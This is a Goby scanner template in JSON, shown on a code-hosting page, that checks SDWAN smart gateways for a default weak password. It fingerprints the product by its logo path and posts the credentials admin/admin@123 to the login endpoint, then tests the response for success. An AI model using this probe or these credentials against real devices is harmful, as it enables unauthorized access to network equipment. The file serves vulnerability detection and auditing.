-
Notifications
You must be signed in to change notification settings - Fork 197
/
SDWAN_smart_gateway_weak_password.json
53 lines (53 loc) · 1.88 KB
/
SDWAN_smart_gateway_weak_password.json
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
{
"Name": "SDWAN智能网关应用系统弱口令",
"Level": "3",
"Tags": [],
"GobyQuery": "body=\"unierm_brand/logo.png\"",
"Description": "",
"Product": "",
"Homepage": "https://gobies.org/",
"Author": "luckying",
"Impact": "",
"Recommandation": "<p>undefined</p>",
"References": [
"https://gobies.org/"
],
"ScanSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/Login/Index/doLogin",
"follow_redirect": false,
"header": {
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"
},
"data_type": "text",
"data": "username=admin&password=admin%40123"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "true",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "userid",
"bz": ""
}
]
},
"SetVariable": []
}
],
"PostTime": "2021-06-23 18:32:59",
"GobyVersion": "1.8.268"
}